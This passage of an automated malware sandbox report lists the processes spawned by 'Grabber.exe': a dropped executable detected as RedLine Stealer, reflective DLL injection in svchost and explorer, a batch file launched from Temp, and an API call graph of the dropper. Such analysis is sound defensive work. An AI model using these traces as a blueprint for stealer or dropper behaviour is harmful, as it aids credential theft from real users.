                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                        Start time:03:11:57
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\systemsx.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\systemsx.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff794830000
                                                                                                                                                                                                                        File size:307'712 bytes
                                                                                                                                                                                                                        MD5 hash:1BBC3BFF13812C25D47CD84BCA3DA2DC
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 75%, ReversingLabs
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                        Start time:03:11:57
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Grabber.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"Grabber.exe"
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:2'000'000 bytes
                                                                                                                                                                                                                        MD5 hash:7BCE43CC96CC747B5909B5FA404C7FFE
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\Desktop\Grabber.exe, Author: Joe Security
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 46%, ReversingLabs
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                        Start time:03:11:57
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff775ae0000
                                                                                                                                                                                                                        File size:69'632 bytes
                                                                                                                                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                        Start time:03:11:57
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff7a91b0000
                                                                                                                                                                                                                        File size:632'808 bytes
                                                                                                                                                                                                                        MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                        Start time:03:11:57
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000006.00000002.3291804673.00000251E2E7D000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                        Start time:03:11:57
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                        Imagebase:0x7ff674740000
                                                                                                                                                                                                                        File size:5'141'208 bytes
                                                                                                                                                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000007.00000000.2060880149.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                        Start time:03:11:57
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmp\B336.bat C:\Users\user\Desktop\Grabber.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff7b4ba0000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                        Start time:03:11:57
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                        Start time:03:12:07
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe"
                                                                                                                                                                                                                        Imagebase:0xe50000
                                                                                                                                                                                                                        File size:307'712 bytes
                                                                                                                                                                                                                        MD5 hash:7B6730CA4DA283A35C41B831B9567F15
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000000.2151588045.0000000000E52000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe, Author: Joe Security
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                        • Detection: 92%, ReversingLabs
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                        Start time:03:12:08
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff7dbd50000
                                                                                                                                                                                                                        File size:307'712 bytes
                                                                                                                                                                                                                        MD5 hash:1BBC3BFF13812C25D47CD84BCA3DA2DC
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                        Start time:03:12:08
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                        Start time:03:12:08
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff7a91b0000
                                                                                                                                                                                                                        File size:632'808 bytes
                                                                                                                                                                                                                        MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                        Start time:03:12:08
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff775ae0000
                                                                                                                                                                                                                        File size:69'632 bytes
                                                                                                                                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                        Start time:03:12:16
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff6068e0000
                                                                                                                                                                                                                        File size:307'712 bytes
                                                                                                                                                                                                                        MD5 hash:1BBC3BFF13812C25D47CD84BCA3DA2DC
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                        Start time:03:12:16
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                        Start time:03:12:16
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff7a91b0000
                                                                                                                                                                                                                        File size:632'808 bytes
                                                                                                                                                                                                                        MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                        Start time:03:12:16
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff775ae0000
                                                                                                                                                                                                                        File size:69'632 bytes
                                                                                                                                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                        Start time:03:12:18
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff641f20000
                                                                                                                                                                                                                        File size:5'915'958 bytes
                                                                                                                                                                                                                        MD5 hash:B40682DDC13C95E3C0228D09A3B6AAE2
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                        • Detection: 34%, ReversingLabs
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                        Start time:03:12:19
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff641f20000
                                                                                                                                                                                                                        File size:5'915'958 bytes
                                                                                                                                                                                                                        MD5 hash:B40682DDC13C95E3C0228D09A3B6AAE2
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:12%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                          Signature Coverage:6.2%
                                                                                                                                                                                                                          Total number of Nodes:1149
                                                                                                                                                                                                                          Total number of Limit Nodes:11
                                                                                                                                                                                                                          execution_graph 5840 7ff79cd671bc 5841 7ff79cd671fc 5840->5841 5876 7ff79cd67214 5840->5876 5842 7ff79cd670d4 _set_fmode 11 API calls 5841->5842 5843 7ff79cd67201 5842->5843 5845 7ff79cd6519c _invalid_parameter_noinfo 47 API calls 5843->5845 5844 7ff79cd67444 5846 7ff79cd655f8 std::_Xinvalid_argument 11 API calls 5844->5846 5847 7ff79cd6720d 5845->5847 5848 7ff79cd67494 5846->5848 5849 7ff79cd61b90 _log10_special 8 API calls 5847->5849 5851 7ff79cd6749c 5848->5851 5858 7ff79cd674ce 5848->5858 5852 7ff79cd6757b 5849->5852 5850 7ff79cd675ac 50 API calls 5850->5876 5853 7ff79cd6716c __free_lconv_num 11 API calls 5851->5853 5856 7ff79cd674a3 5853->5856 5854 7ff79cd6753a 5857 7ff79cd6716c __free_lconv_num 11 API calls 5854->5857 5855 7ff79cd673ed 5859 7ff79cd6740e 5855->5859 5862 7ff79cd6716c __free_lconv_num 11 API calls 5855->5862 5856->5859 5863 7ff79cd6716c __free_lconv_num 11 API calls 5856->5863 5860 7ff79cd67549 5857->5860 5858->5854 5858->5858 5870 7ff79cd67596 5858->5870 5887 7ff79cd66f4c 5858->5887 5865 7ff79cd6716c __free_lconv_num 11 API calls 5859->5865 5864 7ff79cd67562 5860->5864 5868 7ff79cd6716c __free_lconv_num 11 API calls 5860->5868 5861 7ff79cd672ea FindFirstFileExW 5861->5876 5862->5855 5863->5856 5869 7ff79cd6716c __free_lconv_num 11 API calls 5864->5869 5865->5847 5866 7ff79cd6741c 5866->5859 5872 7ff79cd6716c __free_lconv_num 11 API calls 5866->5872 5868->5860 5869->5847 5873 7ff79cd651ec _invalid_parameter_noinfo_noreturn 17 API calls 5870->5873 5871 7ff79cd67393 FindNextFileW 5871->5876 5872->5866 5874 7ff79cd675a8 5873->5874 5875 7ff79cd67413 FindClose 5875->5866 5876->5844 5876->5850 5876->5855 5876->5861 5876->5866 5876->5871 5876->5875 5877 7ff79cd673d5 FindClose 5876->5877 5879 7ff79cd6a550 5876->5879 5877->5876 5880 7ff79cd6a57d 5879->5880 5881 7ff79cd670d4 _set_fmode 11 API calls 5880->5881 5886 7ff79cd6a592 5880->5886 5882 7ff79cd6a587 5881->5882 5883 7ff79cd6519c _invalid_parameter_noinfo 47 API calls 5882->5883 5883->5886 5884 7ff79cd61b90 _log10_special 8 API calls 5885 7ff79cd6a950 5884->5885 5885->5877 5886->5884 5891 7ff79cd66f69 5887->5891 5888 7ff79cd66f6e 5889 7ff79cd66f84 5888->5889 5890 7ff79cd670d4 _set_fmode 11 API calls 5888->5890 5889->5858 5892 7ff79cd66f78 5890->5892 5891->5888 5891->5889 5894 7ff79cd66fba 5891->5894 5893 7ff79cd6519c _invalid_parameter_noinfo 47 API calls 5892->5893 5893->5889 5894->5889 5895 7ff79cd670d4 _set_fmode 11 API calls 5894->5895 5895->5892 5654 7ff79cd643fe 5667 7ff79cd63200 5654->5667 5656 7ff79cd6440b __CxxCallCatchBlock 5657 7ff79cd6444f RaiseException 5656->5657 5658 7ff79cd64476 5657->5658 5673 7ff79cd62b5c 5658->5673 5660 7ff79cd644a7 __CxxCallCatchBlock 5661 7ff79cd63200 _CreateFrameInfo 58 API calls 5660->5661 5662 7ff79cd644ba 5661->5662 5664 7ff79cd63200 _CreateFrameInfo 58 API calls 5662->5664 5666 7ff79cd644c3 5664->5666 5687 7ff79cd6321c 5667->5687 5670 7ff79cd6320e 5670->5656 5671 7ff79cd66604 __GetCurrentState 47 API calls 5672 7ff79cd63218 5671->5672 5674 7ff79cd63200 _CreateFrameInfo 58 API calls 5673->5674 5675 7ff79cd62b6e 5674->5675 5676 7ff79cd62ba9 5675->5676 5678 7ff79cd63200 _CreateFrameInfo 58 API calls 5675->5678 5677 7ff79cd66604 __GetCurrentState 47 API calls 5676->5677 5679 7ff79cd62bae 5677->5679 5680 7ff79cd62b79 5678->5680 5680->5676 5681 7ff79cd62b95 5680->5681 5682 7ff79cd63200 _CreateFrameInfo 58 API calls 5681->5682 5683 7ff79cd62b9a 5682->5683 5683->5660 5684 7ff79cd62dbc 5683->5684 5685 7ff79cd63200 _CreateFrameInfo 58 API calls 5684->5685 5686 7ff79cd62dca 5685->5686 5686->5660 5688 7ff79cd6323b GetLastError 5687->5688 5689 7ff79cd63209 5687->5689 5701 7ff79cd64c2c 5688->5701 5689->5670 5689->5671 5702 7ff79cd64a4c __vcrt_FlsAlloc 5 API calls 5701->5702 5703 7ff79cd64c53 TlsGetValue 5702->5703 5131 7ff79cd619f8 5154 7ff79cd61c5c 5131->5154 5134 7ff79cd61b44 5206 7ff79cd61f88 IsProcessorFeaturePresent 5134->5206 5135 7ff79cd61a14 __scrt_acquire_startup_lock 5137 7ff79cd61b4e 5135->5137 5138 7ff79cd61a32 5135->5138 5139 7ff79cd61f88 std::_Xinvalid_argument 7 API calls 5137->5139 5146 7ff79cd61a53 __scrt_release_startup_lock 5138->5146 5162 7ff79cd65ac8 5138->5162 5142 7ff79cd61b59 __GetCurrentState 5139->5142 5141 7ff79cd61a57 5143 7ff79cd61add 5166 7ff79cd620d0 5143->5166 5145 7ff79cd61ae2 5169 7ff79cd61220 LoadLibraryA LoadLibraryA GetProcAddress GetProcAddress 5145->5169 5146->5141 5146->5143 5195 7ff79cd65dd8 5146->5195 5151 7ff79cd61b05 5151->5142 5202 7ff79cd61de0 5151->5202 5155 7ff79cd61c64 5154->5155 5156 7ff79cd61c70 __scrt_dllmain_crt_thread_attach 5155->5156 5157 7ff79cd61c7d 5156->5157 5158 7ff79cd61a0c 5156->5158 5213 7ff79cd66578 5157->5213 5158->5134 5158->5135 5163 7ff79cd65adb 5162->5163 5164 7ff79cd65b02 5163->5164 5473 7ff79cd618f0 5163->5473 5164->5146 5585 7ff79cd6d840 5166->5585 5170 7ff79cd612b0 5169->5170 5194 7ff79cd614a3 5170->5194 5587 7ff79cd61538 5170->5587 5171 7ff79cd61b90 _log10_special 8 API calls 5173 7ff79cd614b4 5171->5173 5200 7ff79cd62114 GetModuleHandleW 5173->5200 5174 7ff79cd612c9 5176 7ff79cd612e0 5174->5176 5613 7ff79cd61670 5174->5613 5601 7ff79cd614d4 5176->5601 5178 7ff79cd6135a 5179 7ff79cd61538 63 API calls 5178->5179 5180 7ff79cd6136a 5179->5180 5606 7ff79cd6116c 5180->5606 5183 7ff79cd6116c 11 API calls 5184 7ff79cd61396 SetFileAttributesW SetFileAttributesW 5183->5184 5185 7ff79cd6d840 __scrt_get_show_window_mode 5184->5185 5186 7ff79cd613d7 CreateProcessW 5185->5186 5187 7ff79cd6141e CloseHandle CloseHandle 5186->5187 5188 7ff79cd61434 CreateProcessW 5186->5188 5187->5188 5189 7ff79cd6147b CloseHandle CloseHandle 5188->5189 5190 7ff79cd61491 5188->5190 5189->5190 5191 7ff79cd614d4 47 API calls 5190->5191 5192 7ff79cd6149a 5191->5192 5193 7ff79cd614d4 47 API calls 5192->5193 5193->5194 5194->5171 5196 7ff79cd65e10 5195->5196 5197 7ff79cd65def 5195->5197 5198 7ff79cd665c4 47 API calls 5196->5198 5197->5143 5199 7ff79cd65e15 5198->5199 5201 7ff79cd62125 5200->5201 5201->5151 5203 7ff79cd61df1 5202->5203 5204 7ff79cd61b1c 5203->5204 5205 7ff79cd63194 7 API calls 5203->5205 5204->5141 5205->5204 5207 7ff79cd61fae std::_Xinvalid_argument __scrt_get_show_window_mode 5206->5207 5208 7ff79cd61fcd RtlCaptureContext RtlLookupFunctionEntry 5207->5208 5209 7ff79cd61ff6 RtlVirtualUnwind 5208->5209 5210 7ff79cd62032 __scrt_get_show_window_mode 5208->5210 5209->5210 5211 7ff79cd62064 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5210->5211 5212 7ff79cd620b2 std::_Xinvalid_argument 5211->5212 5212->5137 5214 7ff79cd69a0c 5213->5214 5215 7ff79cd61c82 5214->5215 5224 7ff79cd68b94 5214->5224 5235 7ff79cd67fd0 5214->5235 5215->5158 5218 7ff79cd63194 5215->5218 5219 7ff79cd6319c 5218->5219 5220 7ff79cd631a6 5218->5220 5452 7ff79cd63324 5219->5452 5220->5158 5241 7ff79cd68588 EnterCriticalSection 5224->5241 5226 7ff79cd68ba4 5227 7ff79cd68754 53 API calls 5226->5227 5228 7ff79cd68bad 5227->5228 5229 7ff79cd68bbb 5228->5229 5230 7ff79cd6899c 55 API calls 5228->5230 5231 7ff79cd685dc Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 5229->5231 5232 7ff79cd68bb6 5230->5232 5233 7ff79cd68bc7 5231->5233 5234 7ff79cd68a8c GetStdHandle GetFileType 5232->5234 5233->5214 5234->5229 5236 7ff79cd67fdd 5235->5236 5240 7ff79cd68022 5235->5240 5242 7ff79cd66c58 5236->5242 5240->5214 5243 7ff79cd66c69 FlsGetValue 5242->5243 5244 7ff79cd66c84 FlsSetValue 5242->5244 5245 7ff79cd66c7e 5243->5245 5246 7ff79cd66c76 5243->5246 5244->5246 5247 7ff79cd66c91 5244->5247 5245->5244 5248 7ff79cd66c7c 5246->5248 5249 7ff79cd66604 __GetCurrentState 47 API calls 5246->5249 5250 7ff79cd670f4 _set_fmode 11 API calls 5247->5250 5262 7ff79cd67ca8 5248->5262 5251 7ff79cd66cf9 5249->5251 5252 7ff79cd66ca0 5250->5252 5253 7ff79cd66cbe FlsSetValue 5252->5253 5254 7ff79cd66cae FlsSetValue 5252->5254 5256 7ff79cd66cdc 5253->5256 5257 7ff79cd66cca FlsSetValue 5253->5257 5255 7ff79cd66cb7 5254->5255 5259 7ff79cd6716c __free_lconv_num 11 API calls 5255->5259 5258 7ff79cd66934 _set_fmode 11 API calls 5256->5258 5257->5255 5260 7ff79cd66ce4 5258->5260 5259->5246 5261 7ff79cd6716c __free_lconv_num 11 API calls 5260->5261 5261->5248 5285 7ff79cd67f18 5262->5285 5267 7ff79cd67cfa 5267->5240 5268 7ff79cd68ec4 std::_Xinvalid_argument 12 API calls 5269 7ff79cd67d0b 5268->5269 5270 7ff79cd67d13 5269->5270 5272 7ff79cd67d22 5269->5272 5271 7ff79cd6716c __free_lconv_num 11 API calls 5270->5271 5271->5267 5272->5272 5303 7ff79cd6804c 5272->5303 5275 7ff79cd67e1e 5276 7ff79cd670d4 _set_fmode 11 API calls 5275->5276 5278 7ff79cd67e23 5276->5278 5277 7ff79cd67e79 5281 7ff79cd67ee0 5277->5281 5314 7ff79cd677d8 5277->5314 5279 7ff79cd6716c __free_lconv_num 11 API calls 5278->5279 5279->5267 5280 7ff79cd67e38 5280->5277 5282 7ff79cd6716c __free_lconv_num 11 API calls 5280->5282 5284 7ff79cd6716c __free_lconv_num 11 API calls 5281->5284 5282->5277 5284->5267 5286 7ff79cd67f3b 5285->5286 5287 7ff79cd67f45 5286->5287 5329 7ff79cd68588 EnterCriticalSection 5286->5329 5289 7ff79cd67cdd 5287->5289 5292 7ff79cd66604 __GetCurrentState 47 API calls 5287->5292 5296 7ff79cd679a8 5289->5296 5294 7ff79cd67fcf 5292->5294 5330 7ff79cd67734 5296->5330 5299 7ff79cd679c8 GetOEMCP 5302 7ff79cd679ef 5299->5302 5300 7ff79cd679da 5301 7ff79cd679df GetACP 5300->5301 5300->5302 5301->5302 5302->5267 5302->5268 5304 7ff79cd679a8 49 API calls 5303->5304 5305 7ff79cd68079 5304->5305 5306 7ff79cd681cf 5305->5306 5308 7ff79cd680b6 IsValidCodePage 